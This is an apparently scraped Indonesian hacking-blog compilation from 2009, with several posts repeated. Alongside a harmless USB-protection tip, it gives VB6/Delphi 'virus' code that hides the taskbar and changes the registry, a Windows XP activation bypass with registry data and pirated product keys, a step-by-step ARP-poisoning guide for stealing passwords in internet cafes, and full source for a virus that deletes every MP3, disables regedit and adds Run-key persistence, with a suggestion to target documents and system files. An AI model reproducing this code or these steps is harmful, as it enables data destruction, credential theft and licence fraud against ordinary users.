Assalamu'alaikum Wr.Wb
Biasanya Virus Indonesia Kalau Menyebarkan Dirinya Menggunakan FD,
Tanyakan Saja Sama Riesya-Anharku/Morphic/HaKz/Other,
Saya Menemukan Teknik Ini Pada SmadAV,
Caranya Mudah, Pada FD Hapus File Autorun.inf,
Setelah Di Hapus Buatlah Directori/Folder Bernama Autorun.inf,
Pada Folder Autorun.inf Buatlah File Desktop.ini
Isinya :
------------------------------------------------
' [.ShellClassInfo] '
' CLSID={2559a1f2-21d7-11d4-bdaf-00c04f60b9f0} '
------------------------------------------------
Save(Desktop.ini Pada Folder Autorun.inf)
Desktop.ini Selesai, Sekarang Apa Lagi Yah...!
Oh Iya FD Ku Lalu Tak Buka Lagi, Ternyata Ada Folder Lagi
Dan Buatlah Folder Sehingga Menjadi Seperti Ini :
FD:\Autorun.inf\con\aux\nul
Ya Sudah Selesai, Apakah FD Itu Masih Aman...?
Silahkan Riesya Coba Infeksi FD Itu Dengan Virus U Yang Hanya Menginfeksi FD Saja
Oke Apakah Sudah Aman...?
Kalau Belum Aman Silahkan Buat Folder Lagi Di FD
Contoh ':\Δ Virus Δ' Foldernya Dikasih [Segitiga Trus Spasi NamaFolder Spasi Segitiga]
Dan Pada Folder Itu Kamu Kasih Saja File MS.Office (Ex. Doc, xls, ppt, mdb, dan lainnya)
Coba Infeksi File-File Itu, Biasanya Virus Kalau Menginfeksi FD Pasti Mencari File-File
Seperti Image, Document, Text, Dan Lainnya Tanpa Menentukan Folder Apa Yang Mau Di Infeksi,
Memangnya VM Nya Tahu Apa Isi FD Itu, VM Hanyalah Manusia Biasa, Dan AVM Juga Manusia Biasa.
Apakah Bisa, Kalau Masih Bisa Di Infeksi, SIlahkan Download SmadAV Untuk Memproteksi FD U.
Implementasi Nyata :
SmadAV Khan Yang Membuat Smad-Lock, Jika Folder Yang Diberi Nama [Segitiga Spasi Nama Spasi Segitiga], Jika DI Scan Pake Morphost, Riesha AV, And Other Sama Sekali Tidak Bisa Membuka Folder Yang Ada Segitiganya, HaHaHa Smad-Lock Ternyata Sangat Ampuh
Untuk Morphic : Silahkan Gunakan Tehnik Ini Pada Morphost Untuk Memproteksi FD Pengguna Morphost, Pasti Morphost Lebih Di Minati Banyak Orang(Padahal Sebelumnya Sudah Banyak Peminatnya).
Untuk A.M.Hirin : Hallo Hirin Nih Aku Kholis, Aku Mau Nanya Sama Kamu, Khan Aku SUdah Daftar CODENESIA Sebagai User/Anggota, Dan Aku Sudah Mendaftar WebHosting, Kok Nggak Ada Balasan E-Mail Dari CODENESIA, Padahal Aku Ingin
Membuat Website : http://www.the-hacker.codenesia.com , Please Ya hirin WebHostingnya...!
By : Kholis-X
About Me
Friday, July 31, 2009
VIRUS UBAH TAMPILAN TASKBAR,TOOLBAR & DEKSTOP
Saat ini banyak bermunculan virus-virus local dengan berbagaimacam bahasa dan berbagai macam ulahnya saat mengacak-acak registry tapi kebanyakan dari virus-virus local tersebut akan merubah bagian Taskbar,Toolbar dan Dekstop.
Dari Tampilan Taskbar ulah virus salah satunya adalah:
1.membuat start menu hilang fungsi
virus ini terdiri dari 1 form,code:
‘--------------------cut here------------------------------
Option Explicit
'Fungsi Win32 Api yang digunakan
Private Declare Function SetWindowPos Lib "user32" (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, ByVal x As Long, ByVal y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long
Private Declare Function Putfocus Lib "user32" Alias "SetFocus" (ByVal hwnd As Long) As Long
Private Declare Function SetParent Lib "user32" (ByVal hWndChild As Long, ByVal hWndNewParent As Long) As Long
Private Declare Function LockWindowUpdate Lib "user32" (ByVal hwndLock As Long) As Long
Private Declare Function GetCursorPos Lib "user32" (lpPoint As POINTAPI) As Long
Private Declare Function WindowFromPoint Lib "user32" (ByVal xPoint As Long, ByVal yPoint As Long) As Long
Private Declare Function GetClassName Lib "user32" Alias "GetClassNameA" (ByVal hwnd As Long, ByVal lpClassName As String, ByVal nMaxCount As Long) As Long
Private Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Private Declare Function GetWindowPlacement Lib "user32" (ByVal hwnd As Long, lpwndpl As WINDOWPLACEMENT) As Long
'Konstanta yang digunakan pada Fungsi Win32 API
Private Const HWND_NOTOPMOST = -2
Private Const HWND_TOPMOST = -1
'Tipe yang digunakan pada fungsi Win32 API
Private Type POINTAPI
x As Long
y As Long
End Type
Private Type RECT
Left As Long
Top As Long
Right As Long
Bottom As Long
End Type
Private Type WINDOWPLACEMENT
Length As Long
flags As Long
showCmd As Long
ptMinPosition As POINTAPI
ptMaxPosition As POINTAPI
rcNormalPosition As RECT
End Type
Dim hand1 As Long
Dim hand2 As Long
Dim sz As WINDOWPLACEMENT
Private Sub Form_Load()
hand1 = FindWindow("Shell_TrayWnd", vbNullString)
hand2 = FindWindowEx(hand1, 0&, "Button", vbNullString)
GetWindowPlacement hand2, sz
SetParent hand2, 0
Putfocus hand2
SetWindowPos hand2, HWND_TOPMOST, 0, ((Screen.Height / Screen.TwipsPerPixelY) - (sz.rcNormalPosition.Bottom - sz.rcNormalPosition.Top)) + 1, (sz.rcNormalPosition.Right - sz.rcNormalPosition.Left), (sz.rcNormalPosition.Bottom - sz.rcNormalPosition.Top), 0
LockWindowUpdate False
End Sub
‘by:rieysha
‘-------------------end cut-------------------------
2. Menghilangkan start menu
Buka delphi7 klik2x dalam form lalu tulis:
ShowWindow(GetWindow(FindWindow('Shell_traywnd', NiL), 5), 0);
Lalu klik Run(F9).
3. Menghilangkan Taskbar
Buka delphi7 klik2x dalam form lalu tulis:
var
hTaskBar :Thandle;
begin
hTaskBar := FindWindow('Shell_TrayWnd',Nil); ShowWindow(hTaskBar,Sw_Hide);
Lalu klik Run(F9)
4. merubah tampilan jam menjadi nama dari virus tersebut.
Jika di Delphi tulis:
Reg.RootKey := HKEY_CURRENT_USER;
Reg.OpenKey('\Control Panel\International',true);
Reg.WriteString('s1159','rieysha');
Di VisualBasic6.0:
cek = AmbilString(HKCU, "Control Panel\International\s1159", "rieysha")
If cek = "" Then
BuatString HKCU, "Control Panel\International", "s1159", "rieysha"
End If ‘ s1159=AM , s2359=PM
5. mengunci Folder Options pada tool di Toolbar
Caranya sama seperti yang diatas hanya yang dirubah adalah bagian: HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer dengan membuat Dword baru bernama: BackBitmap dengan nilai: 1
6. mengubah Tampilan toolbar menjadi bergambar
Caranya sama seperti yang diatas hanya yang dirubah adalah bagian: Software\Microsoft\Internet Explorer\Toolbar baik HKCU ataupun HKLM-nya dengan membuat string baru bernama: BackBitmap dengan nilai: C:\WINDOWS\ Greenstone.bmp
7. Merubah gambar pada desktop
Di Delphi tinggal men set registry:
Reg.RootKey := HKEY_CURRENT_USER;
Reg.OpenKey('\Control Panel\Desktop',true);
Reg.WriteString('Wallpaper','C:\Windows\Blue Rivets.bmp');
Reg.Free;
SystemParametersInfo(SPI_SetDeskWallpaper,0,nil,SPIF_SENDWININICHANGE);
//menset background desktop menjadi Blue Rivets.bmp
Atau biasanya virus local akan menset background desktop menjadi gambar virus tersebut. Gambar tersebut sebenarnya berada dalam tubuh virus yang akan dikeluarkan pada saat virus dijalankan.
Mungkin segitu dulu yang bisa aku jelasin tentang ulah yang biasa dilakukan virus-virus lokal semoga dengan mengetahui bagian-bagian registry mana yang dirubah oleh virus anda juga bisa mengembalikan registery tersebut ke dalam keadaan semula.
download tutorial
http://www.4shared.com/file/69104541/5393bdaa/VIRUSubahTAMPILAN.html
download project
http://www.4shared.com/file/69106944/80ea78ca/ProjectVirusUbahTampilan.html
thank's to
mas aat atas semuanya dah....
morphic
all virologis
By:rieysha
Monday, July 20, 2009
REMASTERING SISTEM OPERASI AGAR MENJADI ASLI / KILL THE GENUINE (ROMEO MUST DIE)
Perkenankan orang awam akan teknologi ini berbagi pengalaman biar khasanah pengetahuan teknolog bangsa ini semakin melek.
Tool yang harus dipersiapkan ialah nLite yang dapat didownload
http://www.nliteos.com
atu bisa juga tanya ke uncle google. Selanjutnya sebelum menginstall nLite, install dulu Microsoft .NET Framework 2.0 yang dapat ditanyakan ke uncle google juga untuk bantuan download.
Setelah Microsoft .NET Framework 2.0 dan nLite diinstall, maka sekarang ikuti langkah-langkah berikut ini :
1. buka notped dan tulis kode berikut ini :
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WPAEvents]
"OOBETimer"=hex:ff,d5,71,d6,8b,6a,8d,6f,d5,33,93,fd
"LastWPAEventLogged"=hex:d5,07,05,00,06,00,07,00,0f,00,38,00,24,00,fd,02
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion]
"CurrentBuild"="1.511.1 () (Obsolete data - do not use)"
"InstallDate"=dword:427cdd95
"ProductId"="69831-640-1780577-45389"
"DigitalProductId"=hex:a4,00,00,00,03,00,00,00,36,39,38,33,31,2d,36,34,30,2d,\
31,37,38,30,35,37,37,2d,34,35,33,38,39,00,5a,00,00,00,41,32,32,2d,30,30,30,\
30,31,00,00,00,00,00,00,00,00,0d,04,89,b2,15,1b,c4,ee,62,4f,e6,64,6f,01,00,\
00,00,00,00,27,ed,85,43,a2,20,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,31,34,35,30,34,00,00,00,00,00,00,00,ce,0e,\
00,00,12,42,15,a0,00,08,00,00,87,01,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,94,a2,b3,ac
"LicenseInfo"=hex:9e,bf,09,d0,3a,76,a5,27,bb,f2,da,88,58,ce,58,e9,05,6b,0b,82,\
c3,74,ab,42,0d,fb,ee,c3,ea,57,d0,9d,67,a5,3d,6e,42,0d,60,c0,1a,70,24,46,16,\
0a,0a,ce,0d,b8,27,4a,46,53,f3,17
Simpanlah dengan nama “REGTWEAK.REG” tanpa tanda petik.
2. siapkan CD installasi Windows XP Profesional, dan copy isinya ke drive tertentu di komputer kita. Pada percobaan ini, disimpan di drive D: dan diberi nama SRK2
3. setelah dicopy, sekarang buat folder $OEM$ didalam folder STK2 yang dapat dilihat pada gambar nomer 2. setelah itu, pindahkan file REGTWEAK.REG ke dalam folder D:\STK2\$OEM$. Kemudia buka notepad lagi dan ketikan kode berikut ini :
[COMMANDS]
"rundll32 advpack.dll,LaunchINFSection nLite.inf,nLiteReg"
"regedit /s regtweak.reg"
"rundll32 advpack.dll,LaunchINFSection nLite.inf,U"
; Customized by STARKONSOLE
Simpanlah dengan nama “cmdlines.txt” tanpa tanda petik. File ini juga disimpan dalam folder D:\STK2\$OEM$.
4. sekarang saatnya bukan nLite dan pilih bahasa sesuai selera anda.
Klik Lanjut dan tentukan drive hasil pengkopian CD Installasi.
Klik Lanjut dan “Unattended” dan “Bootable ISO”
Klik lanjut dan masukan Serial Number berikut ini :
V2C47-MK7JD-3R89F-D2KXW-VPK3J, atau
JG28K-H9Q7X-BH6W4-3PDCQ-6XBFJ
Klik Lanjut dan buat file iso atau langsung diburning ke CD.
5. lankah terakhir silahkan install PC anda menggunakan CD Hasil remastering, setelah selesai silahkan gunakan tool “Microsoft Genuine Advantage Diagnostic Tool” untuk mengujinya atau bisa saja sambungkan PC anda ke internet dan silah buka situs www.microsoft.com dan pilih menu verifikasi. Insya Allah Sistem Operasi anda sekarang genuine alias asli.
Keterangan :
saya cuman berbagi ilmu supaya pengetahuan bangsa kita akan teknologi semakin melek, selebihnya kalau ilmu ini disalah pergunakan maka saya tidak bertanggungjawab. Hal ini dilakukan sekedar untuk penelitian belaka.
By STARKONSOLE
starkonsole (at) gmail.com
Tool yang harus dipersiapkan ialah nLite yang dapat didownload
http://www.nliteos.com
atu bisa juga tanya ke uncle google. Selanjutnya sebelum menginstall nLite, install dulu Microsoft .NET Framework 2.0 yang dapat ditanyakan ke uncle google juga untuk bantuan download.
Setelah Microsoft .NET Framework 2.0 dan nLite diinstall, maka sekarang ikuti langkah-langkah berikut ini :
1. buka notped dan tulis kode berikut ini :
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WPAEvents]
"OOBETimer"=hex:ff,d5,71,d6,8b,6a,8d,6f,d5,33,93,fd
"LastWPAEventLogged"=hex:d5,07,05,00,06,00,07,00,0f,00,38,00,24,00,fd,02
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion]
"CurrentBuild"="1.511.1 () (Obsolete data - do not use)"
"InstallDate"=dword:427cdd95
"ProductId"="69831-640-1780577-45389"
"DigitalProductId"=hex:a4,00,00,00,03,00,00,00,36,39,38,33,31,2d,36,34,30,2d,\
31,37,38,30,35,37,37,2d,34,35,33,38,39,00,5a,00,00,00,41,32,32,2d,30,30,30,\
30,31,00,00,00,00,00,00,00,00,0d,04,89,b2,15,1b,c4,ee,62,4f,e6,64,6f,01,00,\
00,00,00,00,27,ed,85,43,a2,20,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,31,34,35,30,34,00,00,00,00,00,00,00,ce,0e,\
00,00,12,42,15,a0,00,08,00,00,87,01,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,94,a2,b3,ac
"LicenseInfo"=hex:9e,bf,09,d0,3a,76,a5,27,bb,f2,da,88,58,ce,58,e9,05,6b,0b,82,\
c3,74,ab,42,0d,fb,ee,c3,ea,57,d0,9d,67,a5,3d,6e,42,0d,60,c0,1a,70,24,46,16,\
0a,0a,ce,0d,b8,27,4a,46,53,f3,17
Simpanlah dengan nama “REGTWEAK.REG” tanpa tanda petik.
2. siapkan CD installasi Windows XP Profesional, dan copy isinya ke drive tertentu di komputer kita. Pada percobaan ini, disimpan di drive D: dan diberi nama SRK2
3. setelah dicopy, sekarang buat folder $OEM$ didalam folder STK2 yang dapat dilihat pada gambar nomer 2. setelah itu, pindahkan file REGTWEAK.REG ke dalam folder D:\STK2\$OEM$. Kemudia buka notepad lagi dan ketikan kode berikut ini :
[COMMANDS]
"rundll32 advpack.dll,LaunchINFSection nLite.inf,nLiteReg"
"regedit /s regtweak.reg"
"rundll32 advpack.dll,LaunchINFSection nLite.inf,U"
; Customized by STARKONSOLE
Simpanlah dengan nama “cmdlines.txt” tanpa tanda petik. File ini juga disimpan dalam folder D:\STK2\$OEM$.
4. sekarang saatnya bukan nLite dan pilih bahasa sesuai selera anda.
Klik Lanjut dan tentukan drive hasil pengkopian CD Installasi.
Klik Lanjut dan “Unattended” dan “Bootable ISO”
Klik lanjut dan masukan Serial Number berikut ini :
V2C47-MK7JD-3R89F-D2KXW-VPK3J, atau
JG28K-H9Q7X-BH6W4-3PDCQ-6XBFJ
Klik Lanjut dan buat file iso atau langsung diburning ke CD.
5. lankah terakhir silahkan install PC anda menggunakan CD Hasil remastering, setelah selesai silahkan gunakan tool “Microsoft Genuine Advantage Diagnostic Tool” untuk mengujinya atau bisa saja sambungkan PC anda ke internet dan silah buka situs www.microsoft.com dan pilih menu verifikasi. Insya Allah Sistem Operasi anda sekarang genuine alias asli.
Keterangan :
saya cuman berbagi ilmu supaya pengetahuan bangsa kita akan teknologi semakin melek, selebihnya kalau ilmu ini disalah pergunakan maka saya tidak bertanggungjawab. Hal ini dilakukan sekedar untuk penelitian belaka.
By STARKONSOLE
starkonsole (at) gmail.com
Memanen Password Dengan Sniffer (Man In The Middle Attack) By. 4L13N
By. 4L13N
Hahahaha.... Cuma Bwat Newbie
Teknik ini bisa disebut juga dengan tehnik poisoning/Spoofing kalo ga salah, ato kalo menurut gw, peracunan/penipuan terhadap target.... bingung???
Okee gw jelasin....
Kenapa gw bilang peracunan/penipuan??karna disini kita melakukan penipuan terhadap komputer target melalui mac address komputer gateway, sehingga kita akan mencoba menipu komputer target agar percaya bahwa mac addres komputer gateaway adalah mac addres komputer yang kita pakai...!!!!jadi semua data yang dikirim komputer target akan melewati komputer kita terlebih dahulu..!!!Lol
Dengan tehnik ini kita bisa mencuri username n password, ftp,http,imap,pop3,smb,telnet,vnc,tds,icq,mysql,dll ato bahkan pada situs yang secure sekalipun, yang kebanyakan diawali dengan Https, ex:yahoo mail,internet banking...>>-A
Sekarang saat_nya mendapatkan password tanpa menyerang komputer target secara langsung...!!!
Oke apa yang kita perlukan:
# warnet dengan rame pengunjung... Wi-fi/hotspot juga bisa!!!
yups... karna disini kita melakukan snifer terhadap pengunjung warnet yang melakukan login untuk mendapatkan username N password...
# Dude 2.1 Cari di abang Google.....
aplikasi untuk memonitor network, agar kita tahu pc yang aktive dijaringan, sekalian untuk melakukan komunikasi dengan seluruh jaringan yang ada...
# Cain N abel versi terserah Cari di www.oxid.it ato googling ajee...
Nah ini dia senjata untuk snifer kita kali ini... saat tulisan ini dibuat penulis memakai versi terbaru yang baru di rilis yaitu. V.4.9.4
Setelah semua_Nya siap dan telah terinstal jalankan dude 1.2 kemudian discover Network dan program_Pun akan menampilkan PC yang aktive saat itu lengkap dengan IP address_Nya...
Lalu jalankan program Cain N abel, jangan lupa pilih ethernet card yang dipakai pada bagian configure, start sniffer, klik tab sniffer pada bagian host disana terlihat beberapa komputer lengkap dengan alamat IP N mac adress_Nya, bingung, program cain tahu darimana??? Program cain mengetahui alamat tersebut melalui komunikasi yang dilakukan oleh program Dude, sebenernya pake Ping juga bisa>>-A
Ato bisa juga dengan klik kanan pilih scan mac addres klik ok.
Kemudian klik pada tab APR bagian bawah, lalu klik gambar tanda tambah pada bagian atas pilih salah satu ato semua alamat IP address yang akan di_tipu/diracuni klik ok N start apr.
Setelah semuanya selesai poisoning akan dilancarkan dan kita tinggal menunggu memanen password N username sambil chating n minum susu ...
untuk melihat hasil kerja program cain tinggal klik APR ato Passwords pada bagian bawah....
Penutup :
Tulisan ini hanya sebagai pembelajaran saja penulis tidak bertanggung jawab apabila disalah gunakan, semoga kita tidak menjadi korban internet....
NB :
Pada saat melakukan tester di dua warnet yang berbeda, sebagian pengunjung warnet protes kepada operator karna koneksi internet_Nya menjadi sangat lambat bahkan tidak terkoneksi sama sekali....!!
anda jangan pernah berfikir bahwa tehnik ini tidak akan bisa diketahui oleh orang lain, dilain waktu insya Allah gw akan ngejelasin bagaimana cara untuk mencegah serangan ini, dan mencari tahu siapa pelakunya. Untuk itu berhati-hatilah anda jika melakukan aksi ini....!!>>-A
Untuk melihat hasil dari aksi ini :
http://www.geocities.com/here_4li3n/pass.jpg
Referensi :
www.oxid.it
www.irongeek.com
4L13N Special's Thank's:
ALLAH SWT N Rosul2xnya beserta keluarga dan sahabatnya
AwN24 You Are My Inspiration
Jarul_Kidi3 Jangan berenti ngebimbing gw oke!!!
GiberWay_Community N Gondrong's_Community
N semua virologers...
Salam Hangat By. 4L13N
Hahahaha.... Cuma Bwat Newbie
Teknik ini bisa disebut juga dengan tehnik poisoning/Spoofing kalo ga salah, ato kalo menurut gw, peracunan/penipuan terhadap target.... bingung???
Okee gw jelasin....
Kenapa gw bilang peracunan/penipuan??karna disini kita melakukan penipuan terhadap komputer target melalui mac address komputer gateway, sehingga kita akan mencoba menipu komputer target agar percaya bahwa mac addres komputer gateaway adalah mac addres komputer yang kita pakai...!!!!jadi semua data yang dikirim komputer target akan melewati komputer kita terlebih dahulu..!!!Lol
Dengan tehnik ini kita bisa mencuri username n password, ftp,http,imap,pop3,smb,telnet,vnc,tds,icq,mysql,dll ato bahkan pada situs yang secure sekalipun, yang kebanyakan diawali dengan Https, ex:yahoo mail,internet banking...>>-A
Sekarang saat_nya mendapatkan password tanpa menyerang komputer target secara langsung...!!!
Oke apa yang kita perlukan:
# warnet dengan rame pengunjung... Wi-fi/hotspot juga bisa!!!
yups... karna disini kita melakukan snifer terhadap pengunjung warnet yang melakukan login untuk mendapatkan username N password...
# Dude 2.1 Cari di abang Google.....
aplikasi untuk memonitor network, agar kita tahu pc yang aktive dijaringan, sekalian untuk melakukan komunikasi dengan seluruh jaringan yang ada...
# Cain N abel versi terserah Cari di www.oxid.it ato googling ajee...
Nah ini dia senjata untuk snifer kita kali ini... saat tulisan ini dibuat penulis memakai versi terbaru yang baru di rilis yaitu. V.4.9.4
Setelah semua_Nya siap dan telah terinstal jalankan dude 1.2 kemudian discover Network dan program_Pun akan menampilkan PC yang aktive saat itu lengkap dengan IP address_Nya...
Lalu jalankan program Cain N abel, jangan lupa pilih ethernet card yang dipakai pada bagian configure, start sniffer, klik tab sniffer pada bagian host disana terlihat beberapa komputer lengkap dengan alamat IP N mac adress_Nya, bingung, program cain tahu darimana??? Program cain mengetahui alamat tersebut melalui komunikasi yang dilakukan oleh program Dude, sebenernya pake Ping juga bisa>>-A
Ato bisa juga dengan klik kanan pilih scan mac addres klik ok.
Kemudian klik pada tab APR bagian bawah, lalu klik gambar tanda tambah pada bagian atas pilih salah satu ato semua alamat IP address yang akan di_tipu/diracuni klik ok N start apr.
Setelah semuanya selesai poisoning akan dilancarkan dan kita tinggal menunggu memanen password N username sambil chating n minum susu ...
untuk melihat hasil kerja program cain tinggal klik APR ato Passwords pada bagian bawah....
Penutup :
Tulisan ini hanya sebagai pembelajaran saja penulis tidak bertanggung jawab apabila disalah gunakan, semoga kita tidak menjadi korban internet....
NB :
Pada saat melakukan tester di dua warnet yang berbeda, sebagian pengunjung warnet protes kepada operator karna koneksi internet_Nya menjadi sangat lambat bahkan tidak terkoneksi sama sekali....!!
anda jangan pernah berfikir bahwa tehnik ini tidak akan bisa diketahui oleh orang lain, dilain waktu insya Allah gw akan ngejelasin bagaimana cara untuk mencegah serangan ini, dan mencari tahu siapa pelakunya. Untuk itu berhati-hatilah anda jika melakukan aksi ini....!!>>-A
Untuk melihat hasil dari aksi ini :
http://www.geocities.com/here_4li3n/pass.jpg
Referensi :
www.oxid.it
www.irongeek.com
4L13N Special's Thank's:
ALLAH SWT N Rosul2xnya beserta keluarga dan sahabatnya
AwN24 You Are My Inspiration
Jarul_Kidi3 Jangan berenti ngebimbing gw oke!!!
GiberWay_Community N Gondrong's_Community
N semua virologers...
Salam Hangat By. 4L13N
FULL TUTORIAL MEMBUAT VIRUS MP3 UNTUK MENGURANGI PEMBAJAKAN LAGU (SOK SOK AN)
Huehehehehe...tiba2 kepribadian jahat saya muncul....(setan bertanduk lageeee)....kali ini kita akan membahas pembuatan virus penghancur mp3...loh loh loh...mas...kok gitu...hehehehehe...iya neh...kebetulan para seniman terutama pencipta lagu kita sedang dilanda stress karena lagunya dengan seenaknya dibajak oleh para user seperti kita...Muahahahahaha!....ya iyalah kalo gak pakek musik saya juga bisa mati kalau sedang melakukan programming...JADI YAH BAJAK SAJA!!!!
Virus MP3 virii
Keterangan dari virus ini hanya mencari file berekstensi mp3 dan TANPA AMPUN menghapus seluruh file MP3 yang ada di komputer anda...yaaaaaaa....gak enak dunk...lah namanya membuat virus ya buebas dooo....masak mau ditahan2....hueheheheheh...., ciri2 yang dari virus ini adalah :
1. menon aktifkan :
- Folder Option
- Penglihatan Extensi file (.doc, .exe, .mp3), maksudnya jika kita di windows explorer bisa melihat ekstensi file maka kita tak akan melihat ekstensi file tersebut, biasa pertahanan diri gitu
- mengunci regedit (seperti biasa)
- mematikan winamp secara tiba2 jika file virus aktif
bisa dilihat pada code dibawah ini:
Dim titik As String
titik = """"
CreateKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ServiceOptionMP3", _
titik & "c:\windows\winamp.dll.exe" & titik
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 1
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 1
CreateKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegedit", "1"
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 1
CreateKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegedit", "1"
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", 1
CreateKey "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption", "STOP PIRACY!!!!"
CreateKey "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText", "Stop pembajakan Musisi Dalam Negeri, Jangan Gunakan MP3 lagi (sok sok an) huahahahahaha!!!"
Shell "taskkill /f /im winamp.exe", vbHide
2. Mencari file berekstensi .mp3 yang ada di hardisk, lihat saja code di bawah ini :
'///////////////////////Sub Perangkap Hardisk/////////////
Sub cari()
Dim ictr As Integer
'If InStr(cboDrives.Text, "All Hard Drives") > 0 Then
For ictr = 0 To UBound(sDrives)
'////taruh di sini untuk mencari file virus yang ingin ditangkap, kalau disini saya menangkap file .doc
GetFiles sDrives(ictr), True, "*.mp3"
Next
'Else
'////taruh di sini untuk mencari file virus yang ingin ditangkap, kalau disini saya menangkap file .doc
' frmMain.GetFiles cboDrives.Text, True, "*.doc"
'End If
' frmMain.Visible = True
End Sub
Dan kode ini untuk mencari seluruh partisi hardisk yang ada di komputer
Dim ictr As Integer
Dim iDriveCount As Integer
Dim sAllDrives As String
Dim sDrive As String
ReDim sDrives(0) As String
For ictr = 66 To 90
sDrive = Chr(ictr) & ":\"
If DriveType(sDrive) = "Fixed Drive" Or DriveType(sDrive) = "Removable Drive" Then
If sAllDrives <> "" Then sAllDrives = sAllDrives & ", "
sAllDrives = sAllDrives & sDrive
iDriveCount = iDriveCount + 1
End If
Next
3. Mencari dan MELAHAP SELURUH FILE MP3 TANPA AMPUN, lihat code di bawah ini:
'//////////////////////////////Sub perangkap File/////////////////////
Public Sub GetFiles(Path As String, SubFolder As Boolean, Optional Pattern As String = "*.*")
'Screen.MousePointer = vbHourglass
'Dim li As ListItem
Dim WFD As WIN32_FIND_DATA
Dim hFile As Long, fPath As String, fName As String
Dim bawa As Long
fPath = AddBackslash(Path)
Dim sPattern As String
sPattern = Pattern
fName = fPath & sPattern
hFile = FindFirstFile(fName, WFD)
On Error Resume Next
'///////taruh di bagian ini untuk melakukan tindakan apa setelah file virus ditemukan/////
If (hFile > 0) And ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) <> FILE_ATTRIBUTE_DIRECTORY) Then
'Set li = lvFiles.ListItems.Add(, , fPath & StripNulls(WFD.cFileName))
'MsgBox fPath & StripNulls(WFD.cFileName)
'//////mengeset atribut file .doc menjadi atribut archive atau biasa
bawa = SetFileAttributes(fPath & StripNulls(WFD.cFileName), 0)
FileCopy App.Path & "\" & App.EXEName & ".exe", fPath & StripNulls(WFD.cFileName) & ".exe"
DeleteFile fPath & StripNulls(WFD.cFileName)
End If
If hFile > 0 Then
While FindNextFile(hFile, WFD)
'///////taruh di bagian ini untuk melakukan tindakan apa setelah file virus ditemukan/////
If ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) <> FILE_ATTRIBUTE_DIRECTORY) Then
'Set li = lvFiles.ListItems.Add(, , fPath & StripNulls(WFD.cFileName))
'MsgBox fPath & StripNulls(WFD.cFileName)
'//////mengeset atribut file .doc menjadi atribut archive atau biasa
bawa = SetFileAttributes(fPath & StripNulls(WFD.cFileName), 0)
FileCopy App.Path & "\" & App.EXEName & ".exe", fPath & StripNulls(WFD.cFileName) & ".exe"
DeleteFile fPath & StripNulls(WFD.cFileName)
End If
Wend
End If
If SubFolder Then
hFile = FindFirstFile(fPath & "*.*", WFD)
If (hFile > 0) And ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) = FILE_ATTRIBUTE_DIRECTORY) And _
StripNulls(WFD.cFileName) <> "." And StripNulls(WFD.cFileName) <> ".." Then
GetFiles fPath & StripNulls(WFD.cFileName), True, sPattern
End If
While FindNextFile(hFile, WFD)
If ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) = FILE_ATTRIBUTE_DIRECTORY) And _
StripNulls(WFD.cFileName) <> "." And StripNulls(WFD.cFileName) <> ".." Then
GetFiles fPath & StripNulls(WFD.cFileName), True, sPattern
End If
Wend
End If
FindClose hFile
'Set li = Nothing
'Screen.MousePointer = vbDefault
End Sub
Nah setelah terkena file ini maka yang akan terjadi seluruh file mp3 akan berubah menjadi .exe dan file .mp3 akan dihapus tanpa amapun....buehehehehehe....jadi ya siap - siap mem-backup hardisk anda terutama file mp3. OKeh......ih kok jahat sekali sih.....ya sekali lagi membuat virus itu harus jahat.
-------------------------------TIPS SETAN-----------------------------------
COBA YANG DICARI BUKAN FILE MP3 SAJA TAPI FILE SISTEM ATAU FILE .DOC .XLS DAN .DAT, BUKANKAH ITU MENYENANGKAN?Tapi tetep saja menjadi penghancur.....seorang virus maker yang baik tidak akan menghancurkan tapi akan membuat dunia lebih baik lewat komputer tul gak...
-------------------------------------------------------------------------------
